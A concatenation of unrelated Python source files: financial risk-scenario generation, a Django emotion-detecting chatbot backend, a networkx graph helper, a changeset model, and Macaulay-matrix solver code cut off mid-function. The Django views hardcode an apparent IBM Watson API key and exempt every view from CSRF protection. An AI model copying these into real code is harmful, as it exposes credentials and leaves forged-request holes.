get_output_filename_simple(\n ael_variables['volcorr_file_path'],\n ael_variables['corr_file_name'],\n self.overwrite_volcorr_files, \"\")\n else:\n self.corr_file_path = None\n \n self.ext_id_infos = self.get_ext_id_infos()\n \n def validate_and_open_file(self, path, overwrite):\n if not overwrite and os.path.isfile(path):\n raise IOError(\"File already exists at '%s'\" % path)\n logger.LOG(\"Opening file at '%s'\" % path)\n return open(path, \"w\")\n \n def get_scenario_file(self):\n if not self.scenario_file_path:\n return None\n return self.validate_and_open_file(self.scenario_file_path,\n self.overwrite_scenario_file)\n \n def get_volatility_file(self):\n if not self.vol_file_path:\n return None\n return self.validate_and_open_file(self.vol_file_path,\n self.overwrite_volcorr_files)\n\n def get_correlation_file(self):\n if not self.corr_file_path:\n return None\n return self.validate_and_open_file(self.corr_file_path,\n self.overwrite_volcorr_files)\n \n def decay_factor(self):\n if self.estimation_method == \"SMA\":\n return None\n else:\n return self.dec_factor\n \n def get_ext_id_infos(self):\n rf_dyn = FRiskFactorExtractionUtils.risk_factor_dynamics_from_ext_id\n ext_id_infos = \\\n [(ext_id, rf_dyn(ext_id, self.spec_header)) \\\n for ext_id in self.ext_ids]\n return ext_id_infos\n \ndef do_generation(ael_variables, result):\n if not ael_variables['generate_scenarios'] == \"True\":\n return\n generator_parameters = GeneratorParameters(ael_variables, result)\n \n scenario_ostream = None\n vol_ostream = None\n corr_ostream = None\n \n if generator_parameters.generate_scenarios or \\\n generator_parameters.generate_volcorr_file:\n try:\n scenario_ostream = generator_parameters.get_scenario_file()\n rel_returns = FRiskFactorScenarioFileGeneration.hist_scenario(\n generator_parameters.raw_data,\n generator_parameters.ext_id_infos,\n generator_parameters.spec_header,\n generator_parameters.scenario_calendar,\n generator_parameters.horizon,\n generator_parameters.scenario_end_day,\n generator_parameters.nbr_of_scenarios,\n generator_parameters.overlapping_scenarios,\n generator_parameters.delimiter,\n generator_parameters.comment_char,\n DATE_ORDER_LAST_TO_FIRST,\n scenario_ostream)\n except Exception as msg:\n logger.ELOG(\"Failed to generate historical scenario: %s\" % msg)\n raise\n finally:\n if scenario_ostream:\n scenario_ostream.close()\n \n if generator_parameters.generate_volcorr_file:\n try:\n vol_ostream = generator_parameters.get_volatility_file()\n corr_ostream = generator_parameters.get_correlation_file()\n FRiskFactorVolCorrGeneration.write_vol_corr_file(rel_returns,\n generator_parameters.ext_id_infos,\n generator_parameters.decay_factor(),\n vol_ostream,\n corr_ostream,\n generator_parameters.vol_delimiter,\n generator_parameters.cross_delimiter,\n generator_parameters.corr_delimiter)\n except Exception as msg:\n logger.ELOG(\"Failed to generate vol/corr files: %s\" % msg)\n raise\n finally:\n if vol_ostream:\n vol_ostream.close()\n if corr_ostream:\n corr_ostream.close()\n","sub_path":"Extensions/Default/FPythonCode/FRiskFactorGenerationControl.py","file_name":"FRiskFactorGenerationControl.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231104512","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nimport sys\n\nfrom context_recognition import ContextRecognition\nfrom ibm_watson import ToneAnalyzerV3\nfrom ibm_watson.tone_analyzer_v3 import ToneInput\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom joblib import load\nfrom .models import User\n\nimport soundfile\nimport librosa\nimport pyttsx3\nimport json\nimport numpy as np\nfrom scipy.io.wavfile import read as read_wav\nimport librosa\nimport speech_recognition as sr\n\nengine = pyttsx3.init()\nclf = load('leo/model19.joblib')\nclf2 = load('leo/agg.joblib')\nvec = load('leo/vec.joblib')\nauthenticator = IAMAuthenticator('6RDOALhXeOxtJNBvB9DgE7WcpMe_Wda0XeHCg424WD0d')\nservice = ToneAnalyzerV3(\n version='2017-09-21',\n authenticator=authenticator)\nservice.set_service_url('https://gateway-lon.watsonplatform.net/tone-analyzer/api')\ncontext = ContextRecognition()\ncontext.load_corpus(\"corpus/\")\ncontext.load_model()\nr = sr.Recognizer()\n\nbefore1=[]\nafter1= []\nname1 = ''\ntext1 = ''\nemotions1 = ''\n\n\n@csrf_exempt\ndef index(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index2.html', {})\n\n@csrf_exempt\ndef index3(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index3.html', {})\n\n@csrf_exempt\ndef index4(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index4.html', {})\n\n@csrf_exempt\ndef index5(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index5.html', {})\n\n@csrf_exempt\ndef privacy(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/privacy.html', {})\n\n\n@csrf_exempt\n#create responding chatbot sentence\ndef get_sentence(request):\n text = request.POST.get('text', False)\n response, correlation = context.compute_document_similarity(text)\n return HttpResponse(response)\n\n@csrf_exempt\n#process incoming speech+text\ndef get_blob(request):\n data = request.POST.copy()\n video_stream = request.FILES['audio'].read()\n text = request.POST.get('text', False)\n with open('myfile.wav', mode='wb') as f:\n f.write(video_stream)\n\n text2 = ''\n hellow=sr.AudioFile('myfile.wav')\n with hellow as source:\n audio = r.record(source)\n try:\n text2 = r.recognize_google(audio)\n except Exception as e:\n text2 = e\n\n emotion = text_emotion(text2)\n prediction = speech_emotion('myfile.wav')\n aggression = agg_detection(text2)\n json_stuff = json.dumps({\"list\": [prediction, emotion, aggression,text2]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\n@csrf_exempt\ndef get_text(request):\n text = request.POST.get('text', False)\n emotion = text_emotion(text)\n aggression = agg_detection(text)\n json_stuff = json.dumps({\"list\": ['no voice',emotion, aggression]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\ndef get_blob_text(request):\n text = request.POST.get('text', False)\n emotion = text_emotion(text)\n aggression = agg_detection(text)\n json_stuff = json.dumps({\"list\": [\"No voice\", emotion, aggression]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\n@csrf_exempt\ndef add_to_db(request):\n global before1, after1, name1, text1, emotions1\n json_stuff= json.dumps({'start':'start db'})\n if request.POST.get('q_1','')!='':\n q1b = request.POST.get('q_1','')\n q2b = request.POST.get('q_2','')\n q3b = request.POST.get('q_3','')\n q4b = request.POST.get('q_4','')\n q5b = request.POST.get('q_5','')\n q6b = request.POST.get('q_6','')\n q7b = request.POST.get('q_7','')\n q8b = request.POST.get('q_8','')\n q9b = request.POST.get('q_9','')\n q10b = request.POST.get('q_10','')\n before1 = [q1b,q2b,q3b,q4b,q5b,q6b,q7b,q8b,q9b,q10b]\n return redirect(\"/index4\")\n if request.POST.get('name', False)!=False:\n name1 = request.POST.get('name', False)\n text1 = request.POST.get('text', False)\n emotions1 = request.POST.get('emotions', False)\n return redirect(\"/index5\")\n if request.POST.get('question_9','')==\"1\":\n q1a = request.POST.get('question_1','')\n q2a = request.POST.get('question_2','')\n q3a = request.POST.get('question_3','')\n q4a = request.POST.get('question_4','')\n q5a = request.POST.get('question_5','')\n q6a = request.POST.get('question_6','')\n q7a = request.POST.get('question_7','')\n q8a = request.POST.get('question_8','')\n q10a = request.POST.get('question_10','')\n q11a = request.POST.get('question_11','')\n q12a = request.POST.get('question_12','')\n q13a = request.POST.get('question_13','')\n q14a = request.POST.get('question_14','')\n q15a = request.POST.get('question_15','')\n q16a = request.POST.get('question_16','')\n q17a = request.POST.get('question_17','')\n after1 = [q1a,q2a,q3a,q4a,q5a,q6a,q7a,q8a,q10a,q11a,q12a,q13a,q14a,q15a,q16a,q17a]\n user = User(name=name1, text=text1, emotions=emotions1, before=before1, after=after1)\n user.save()\n json_stuff = json.dumps({name1: [text1,emotions1]})\n return redirect(\"/#\")\n return redirect(\"/#\")\n\n\n # return HttpResponse(status=204)\n\n\n\n# heard emotion\ndef extract_feature(file_name, mfcc, chroma, mel):\n\n X,sample_rate= librosa.load(file_name)\n if chroma:\n if len(X.shape) > 1 and X.shape[1] > 1:\n X = X.mean(axis=1)\n stft = np.abs(librosa.stft(X))\n result = np.array([])\n if mfcc:\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)\n result = np.hstack((result, mfccs))\n if chroma:\n chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T, axis=0)\n result = np.hstack((result, chroma))\n if mel:\n mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T, axis=0)\n result = np.hstack((result, mel))\n return result\n\n\ndef speech_emotion(file):\n feature = extract_feature(file, mfcc=True, chroma=True, mel=True)\n prediction = clf.predict(feature.reshape(1, -1))\n return prediction[0]\n\n\n# aggression detection\ndef predict_aggression1(text,countvector,model):\n return model.predict(countvector.transform([text]))[0]\n\n\ndef agg_detection(text):\n prediction = predict_aggression1(text,vec,clf2)\n return prediction\n\n\n# read emotion\ndef text_emotion(text):\n tone_input = ToneInput(text)\n tone_analysis = service.tone(tone_input, content_type='application/json').get_result()\n best_score = 0\n best_emotion = \"neutral\"\n tones = tone_analysis[\"document_tone\"]\n for tone in tones[\"tones\"]:\n if tone[\"score\"] > best_score:\n best_score = tone[\"score\"]\n best_emotion = tone[\"tone_id\"]\n return best_emotion\n","sub_path":"chtbt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"198851668","text":"\"\"\"\nA convenience wrapper around networkx's constructor\nfor (some) compatibility with our own graph class.\n\nThe compatibility is relatively limited. For example the edges methods\nis richer in networkx, but does not include the capacity, nor reverse\nedges for undirected graphs.\n\nWe test the compatibility of the basic methods on all the examples::\n\n >>> import graph, graph_networkx\n >>>\n >>> for G, GN in zip( graph.examples.all(), graph_networkx.examples.all() ):\n ... assert G.is_directed() == GN.is_directed()\n ... assert tuple(G.vertices()) == GN.vertices()\n ... assert G.vertex_number() == GN.vertex_number()\n ... #assert G.edge_number() == GN.edge_number()\n ... for v in G.vertices():\n ... assert set(G.neighbors_out(v)) == set(GN.neighbors(v))\n ... for v1, v2, c in G.edges():\n ... assert GN.is_edge(v1, v2)\n ... for v1, v2 in GN.edges():\n ... assert G.is_edge(v1, v2)\n ... H = G.networkx()\n ... assert H.vertices() == GN.vertices()\n ... assert H.edges() == GN.edges()\n ... assert H.is_directed() == GN.is_directed()\n\"\"\"\n\nimport networkx\n\nimport warnings\n\ndef Graph(vertices, edges, directed=False):\n if directed:\n G = networkx.DiGraph()\n else:\n G = networkx.Graph()\n G.add_nodes_from(vertices)\n if edges:\n if len(edges[0]) == 2:\n G.add_edges_from(edges)\n else:\n G.add_weighted_edges_from(edges)\n return G\n\ndef Analysis_cycle(self): \n marked = { u : False for u in self }\n found_cycle = [False]\n for u in self.vertices():\n l=[]\n if marked[u]==False:\n res,marked,l=visit(self, u, u, marked,l)\n if res==True:\n return True,marked,l\n return False,marked,l\n\ndef visit(self, u, pred_node, marked,l):\n l.append(u)\n marked[u] = pred_node\n res=False\n for v in self.neighbors_out(u):\n if marked[v] !=False and v != pred_node:\n return True,marked,l\n if not marked[v]:\n r=visit(self, v, u, marked,l)\n res,marked,l=r\n if res==True:\n return True,marked,l\n return False,marked,l\ndef is_acyclic(self):\n return not Analysis_cycle(self)[0]\ndef is_cyclic(self):\n return Analysis_cycle(self)[0]\ndef find_cycle(self):\n return Analysis_cycle(self)[2]\ndef show(self):\n \"\"\"\n Return a bqplot widget representing the graph\n \"\"\"\n import bqplot.marks\n from ipywidgets import Layout\n import traitlets\n nodes = self.vertices()\n edges = self.edges()\n node_data = [ str(i) for i in nodes ]\n rank = { v: i for i,v in enumerate(nodes) }\n link_data = [{'source': rank[edge[0]],\n 'target': rank[edge[1]],\n } for edge in edges]\n colors = [\"white\" for node in nodes]\n\n try:\n # ignore a FutureWarning in numpy raised\n # by networkx's planar_layout\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n layout = networkx.planar_layout(self)\n except networkx.NetworkXException:\n layout = networkx.spring_layout(self)\n xs = bqplot.LinearScale()\n ys = bqplot.LinearScale()\n x = [layout[node][0] for node in nodes]\n y = [layout[node][1] for node in nodes]\n\n fig_layout = Layout(width='400px', height='400px')\n mark = bqplot.marks.Graph(node_data=node_data,\n link_data=link_data,\n link_type='line', directed=self.is_directed(),\n scales={'x': xs, 'y': ys, }, x=x, y=y,\n colors=colors,\n charge=-600)\n return bqplot.Figure(marks=[mark],\n layout=fig_layout)\n\ndef vertices(self):\n return tuple(self.nodes())\nnetworkx.Graph.vertices = vertices\nnetworkx.DiGraph.vertices = vertices\nnetworkx.Graph.vertex_number = networkx.Graph.number_of_nodes\nnetworkx.DiGraph.vertex_number = networkx.DiGraph.number_of_nodes\nnetworkx.Graph.edge_number = networkx.Graph.number_of_edges\nnetworkx.DiGraph.edge_number = networkx.DiGraph.number_of_edges\nnetworkx.Graph.is_edge = networkx.Graph.has_edge\nnetworkx.DiGraph.has_edge = networkx.DiGraph.has_edge\nnetworkx.Graph.show = show\nnetworkx.DiGraph.show = show\nnetworkx.Graph.neighbors_out = networkx.Graph.neighbors\nnetworkx.DiGraph.neighbors_out = networkx.DiGraph.neighbors\n\nimport graph_examples\nexamples = graph_examples.Examples(Graph)\n","sub_path":"essai/4-ArbresCouvrants/graph_networkx.py","file_name":"graph_networkx.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"177510108","text":"# -*- encoding: utf-8 -*-\n#\n# Copyright 2016 Jay Pipes\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom procession import helpers\nfrom procession.object_defs import base\nfrom procession.object_defs import fields\n\n\nclass Changeset(base.Object):\n \"\"\"\n Represents code that has been proposed for merging into a target branch.\n The changeset has a state, which is a fixed integer value representing\n the status of the changeset in relation to the target branch. Each\n changeset targets one and only one repository.\n \"\"\"\n\n class State(fields.Enum):\n ABANDONED = 0\n DRAFT = 1\n ACTIVE = 5\n CLEARED = 8\n MERGED = 12\n\n CHOICES = {\n ABANDONED: \"Abandoned\",\n DRAFT: \"Draft\",\n ACTIVE: \"Active\",\n CLEARED: \"Cleared\",\n MERGED: \"Merged\",\n }\n\n field_defs = {\n 'uuid': fields.UUID(default=helpers.ordered_uuid),\n 'target_repository': fields.Object('Repository'),\n 'target_branch': fields.AsciiText(),\n 'uploaded_by': fields.Object('User'),\n 'state': State(default=State.ACTIVE),\n 'commit_message': fields.UTF8Text(),\n }\n\n","sub_path":"procession/object_defs/changeset.py","file_name":"changeset.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"158036659","text":"import numpy as np\nimport itertools\nfrom scipy.linalg import qr, solve_triangular, qr_multiply\nfrom numalgsolve.polynomial import Polynomial, MultiCheb, MultiPower\nfrom numalgsolve.utils import row_swap_matrix, MacaulayError, slice_top, mon_combos, \\\n num_mons_full, memoized_all_permutations, mons_ordered, \\\n all_permutations_cheb\n\ndef add_polys(degree, poly, poly_coeff_list):\n \"\"\"Adds polynomials to a Macaulay Matrix.\n\n This function is called on one polynomial and adds all monomial multiples of\n it to the matrix.\n\n Parameters\n ----------\n degree : int\n The degree of the Macaulay Matrix\n poly : Polynomial\n One of the polynomials used to make the matrix.\n poly_coeff_list : list\n A list of all the current polynomials in the matrix.\n Returns\n -------\n poly_coeff_list : list\n The original list of polynomials in the matrix with the new monomial\n multiplications of poly added.\n \"\"\"\n\n poly_coeff_list.append(poly.coeff)\n deg = degree - poly.degree\n dim = poly.dim\n\n mons = mon_combos([0]*dim,deg)\n\n for mon in mons[1:]: #skips the first all 0 mon\n poly_coeff_list.append(poly.mon_mult(mon, returnType = 'Matrix'))\n return poly_coeff_list\n\ndef find_degree(poly_list, verbose=False):\n '''Finds the appropriate degree for the Macaulay Matrix.\n\n Parameters\n --------\n poly_list: list\n The polynomials used to construct the matrix.\n\n Returns\n -----------\n find_degree : int\n The degree of the Macaulay Matrix.\n\n '''\n if verbose:\n print('Degree of Macaulay Matrix:', sum(poly.degree for poly in poly_list) - len(poly_list) + 1)\n return sum(poly.degree for poly in poly_list) - len(poly_list) + 1\n\ndef rrqr_reduceMacaulay(matrix, matrix_terms, cuts, number_of_roots, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style.\n\n The matrix is split into the shape\n A B C\n D E F\n Where A is square and contains all the highest terms, and C contains all the x,y,z etc. terms. The lengths\n are determined by the matrix_shape_stuff tuple. First A and D are reduced using rrqr without pivoting, and then the rest of\n the matrix is multiplied by Q.T to change it accordingly. Then E is reduced by rrqr with pivoting, the rows of B are shifted\n accordingly, and F is multipled by Q.T to change it accordingly. This is all done in place to save memory.\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n ''' \n #print(\"Starting matrix.shape:\\n\", matrix.shape)\n #RRQR reduces A and D without pivoting sticking the result in it's place.\n Q1,matrix[:,:cuts[0]] = qr(matrix[:,:cuts[0]])\n \n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #Looks like 0 but not, add to the rank.\n #still_good = np.sum(np.abs(matrix[:,:cuts[0]].diagonal()) < accuracy)\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # print(matrix[:,:cuts[0]].diagonal())\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n #Multiplying the rest of the matrix by Q.T\n matrix[:,cuts[0]:] = Q1.T@matrix[:,cuts[0]:]\n Q1 = 0 #Get rid of Q1 for memory purposes.\n\n #RRQR reduces E sticking the result in it's place.\n Q,matrix[cuts[0]:,cuts[0]:cuts[1]],P = qr(matrix[cuts[0]:,cuts[0]:cuts[1]], pivoting = True)\n\n #Multiplies F by Q.T.\n matrix[cuts[0]:,cuts[1]:] = Q.T@matrix[cuts[0]:,cuts[1]:]\n Q = 0 #Get rid of Q for memory purposes.\n\n #Shifts the columns of B\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n\n #Checks for 0 rows and gets rid of them.\n #rank = np.sum(np.abs(matrix.diagonal())>accuracy) + still_good\n #matrix = matrix[:rank]\n\n #eliminates rows we don't care about-- those at the bottom of the matrix\n #since the top corner is a square identity matrix, useful_rows + number_of_roots is the width of the Macaulay matrix\n matrix = row_swap_matrix(matrix)\n for row in matrix[::-1]:\n if np.allclose(row, 0):\n matrix = matrix[:-1]\n else:\n break\n #print(\"Final matrix.shape:\\n\", matrix.shape)\n #useful_rows = matrix.shape[1] - number_of_roots\n #matrix = matrix[:useful_rows,:]\n\n #set very small values in the matrix to zero before backsolving\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n\n #Resorts the matrix_terms.\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n #print(\"Macaulay1Rank:\", np.sum(np.abs(matrix.diagonal())>accuracy)) \n \n return matrix, matrix_terms\n\ndef rrqr_reduceMacaulay2(matrix, matrix_terms, cuts, number_of_roots, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style\n\n This function does the same thing as rrqr_reduceMacaulay but uses\n qr_multiply instead of qr and a multiplication\n to make the function faster and more memory efficient.\n\n This function only works properly if the bottom left (D) part of the matrix is zero\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n accuracy : float\n What is determined to be 0.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n '''\n #print(\"Starting matrix.shape:\\n\", matrix.shape)\n #RRQR reduces A and D without pivoting sticking the result in it's place.\n C1,matrix[:cuts[0],:cuts[0]] = qr_multiply(matrix[:,:cuts[0]], matrix[:,cuts[0]:].T, mode = 'right')\n matrix[:cuts[0],cuts[0]:] = C1.T\n C1 = 0\n\n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n #set small values to zero before backsolving\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n\n matrix[:cuts[0],cuts[0]:] = solve_triangular(matrix[:cuts[0],:cuts[0]],matrix[:cuts[0],cuts[0]:])\n matrix[:cuts[0],:cuts[0]] = np.eye(cuts[0])\n matrix[cuts[0]:,cuts[0]:] -= (matrix[cuts[0]:,:cuts[0]])@matrix[:cuts[0],cuts[0]:] #?\n\n C,R,P = qr_multiply(matrix[cuts[0]:,cuts[0]:cuts[1]], matrix[cuts[0]:,cuts[1]:].T, mode = 'right', pivoting = True)\n\n matrix = matrix[:R.shape[0]+cuts[0]]\n #matrix[cuts[0]:,:cuts[0]] = np.zeros_like(matrix[cuts[0]:,:cuts[0]])\n matrix[cuts[0]:,cuts[0]:cuts[0]+R.shape[1]] = R\n matrix[cuts[0]:,cuts[0]+R.shape[1]:] = C.T\n C,R = 0,0\n\n #Shifts the columns of B.\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n P = 0\n\n # Check if there are no solutions\n #rank = np.sum(np.abs(matrix.diagonal())>accuracy)\n\n # extra_block = matrix[rank:, -matrix_shape_stuff[2]:]\n # Q,R = qr(extra_block)\n # if np.sum(np.abs(R.diagonal())>accuracy) == matrix_shape_stuff[2]:\n # raise ValueError(\"The system given has no roots.\")\n\n #Get rid of 0 rows at the bottom.\n #matrix = matrix[:rank]\n\n #eliminates rows we don't care about-- those at the bottom of the matrix\n #since the top corner is a square identity matrix, always_useful_rows + number_of_roots is the width of the Macaulay matrix\n always_useful_rows = matrix.shape[1] - number_of_roots\n #matrix = matrix[:useful_rows,:]\n\n #set small values in the matrix to zero now, after the QR reduction\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n #eliminate zero rows from the bottom of the matrix. Zero rows above\n #nonzero elements are not eliminated. This saves time since Macaulay matrices\n #we deal with are only zero at the very bottom\n matrix = row_swap_matrix(matrix)\n for row in matrix[::-1]:\n if np.allclose(row, 0):\n matrix = matrix[:-1]\n else:\n break\n\n return matrix, matrix_terms\n\ndef rrqr_reduceMacaulayFullRank(matrix, matrix_terms, cuts, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style.\n\n This function does the same thing as rrqr_reduceMacaulay2 but only works if the matrix is full rank AND if\n the top left corner (the square of side length cut[0]) is invertible.\n In this case it is faster.\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n accuracy : float\n What is determined to be 0.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n '''\n C1,matrix[:cuts[0],:cuts[0]] = qr_multiply(matrix[:cuts[0],:cuts[0]],\\\n matrix[:cuts[0],cuts[0]:].T, mode = 'right')\n matrix[:cuts[0],cuts[0]:] = C1.T\n C1 = 0\n\n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n C,matrix[cuts[0]:,cuts[0]:cuts[1]],P = qr_multiply(matrix[cuts[0]:,cuts[0]:cuts[1]],\\\n matrix[cuts[0]:,cuts[1]:].T, mode = 'right', pivoting = True)\n\n matrix[cuts[0]:,cuts[1]:] = C.T\n C = 0\n\n #Shifts the columns of B.\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n P = 0\n return matrix, matrix_terms\n\ndef checkEqual(lst):\n '''Helper function for createMatrixFast. Checks if each element in a list is the same.\n\n Parameters\n ----------\n lst : list\n The list of interest.\n Returns\n -------\n checkEqual : bool\n True if each element in the list is the same. False otherwise.\n '''\n return lst.count(lst[0]) == len(lst)\n\ndef get_ranges(nums):\n '''Helper function for createMatrixFast. Finds where to slice the different parts of the matrix into.\n\n This is in an effort to avoid row_swap_matrix which can be slow. Instead, as we are buiding the part of the\n matrix corresponding to each polynomial seperately, this tells us where each part should go in the whole matrix.\n\n Parameters\n ----------\n nums : list\n The Macualay matrix degree minus the polynomial degrees for for each polynomial.\n Returns\n -------\n ranges : list\n The rows in the Macaulay Matrix that the given polynomail will be sliced into.\n '''\n ranges = []\n for i in nums:\n ranges.append(np.array([],dtype=int))\n start = 0\n count = 0\n n = len(nums)\n for num in nums:\n spot = count\n for r in ranges[count:]:\n r = np.hstack((r,np.arange(start,start+(n-count)*(num-len(r)),n-count)))\n ranges[spot] = r\n start+=1\n spot += 1\n start = ranges[-1][-1]+1\n count+=1\n return ranges\n\ndef createMatrixFast(polys, degree, dim):\n ''' Builds a Macaulay matrix using fast construction.\n\n Parameters\n ----------\n poly_coeffs : list.\n Contains numpy arrays that hold the coefficients of the polynomials to be put in the matrix.\n degree : int\n The degree of the Macaulay Matrix\n dim : int\n The dimension of the polynomials going into the matrix.\n Returns\n -------\n matrix : 2D numpy array\n The Macaulay matrix.\n matrix_terms : numpy array\n The ith row is the term represented by the ith column of the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n '''\n bigShape = [degree+1]*dim\n\n matrix_terms, cuts = sorted_matrix_terms(degree, dim)\n columns = len(matrix_terms)\n\n range_split = [num_mons_full(degree-poly.degree,dim) for poly in polys]\n rows = np.sum(range_split)\n ranges = get_ranges(range_split) #How to slice the poly into the matrix rows.\n matrix = np.zeros((rows,columns))\n curr = 0\n\n #Get the slices needed to pull the matrix_terms from the coeff matrix.\n matrix_term_indexes = list()\n for row in matrix_terms.T:\n matrix_term_indexes.append(row)\n\n permutations = None\n currentDegree = 2\n #Adds the poly_coeffs to flat_polys, using added_zeros to make sure every term is in there.\n added_zeros = np.zeros(bigShape)\n\n for poly,matrix_range in zip(polys,ranges):\n slices = slice_top(poly.coeff)\n added_zeros[slices] = poly.coeff\n array = added_zeros[matrix_term_indexes]\n added_zeros[slices] = np.zeros_like(poly.coeff)\n\n permutations = memoized_all_permutations(degree - poly.degree, dim, degree, permutations, currentDegree)\n currentDegree = degree - poly.degree\n permList = list(permutations.values())\n\n temp = array[np.reshape(permList, (len(permList), columns))[::-1]]\n matrix[matrix_range] = temp\n\n if matrix_shape_stuff[0] > matrix.shape[0]: #The matrix isn't tall enough, these can't all be pivot columns.\n raise MacaulayError(\"HIGHEST NOT FULL RANK. TRY HIGHER DEGREE\")\n #Sorts the rows of the matrix so it is close to upper triangular.\n if not checkEqual([poly.degree for poly in polys]): #Will need some switching possibly if some degrees are different.\n matrix = row_swap_matrix(matrix)\n return matrix, matrix_terms, cuts\n\ndef construction(polys, degree, dim):\n ''' Builds a Macaulay matrix using fast construction in the Chebyshev basis.\n\n Parameters\n ----------\n polys : list.\n Contains numpy arrays that hold the coefficients of the polynomials to be put in the matrix.\n degree : int\n The degree of the Macaulay Matrix\n dim : int\n The dimension of the polynomials going into the matrix.\n Returns\n -------\n matrix : 2D numpy array\n The Macaulay matrix.\n matrix_terms : numpy array\n The ith row is the term represented by the ith column of the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n '''\n bigShape = [degree+1]*dim\n matrix_terms, cuts = sorted_matrix_terms(degree, dim)\n #print(matrix_shape_stuff)\n matrix_term_indexes = list()\n for row in matrix_terms.T:\n matrix_term_indexes.append(row)\n\n permutations = all_permutations_cheb(degree - np.min([poly.degree for poly in polys]), dim, degree)\n #print(permutations)\n added_zeros = np.zeros(bigShape)\n flat_polys = list()\n i = 0;\n for poly in polys:\n slices = slice_top(poly.coeff)\n added_zeros[slices] = poly.coeff\n array = added_zeros[matrix_term_indexes]\n added_zeros[slices] = np.zeros_like(poly.coeff)\n #print(array)\n\n 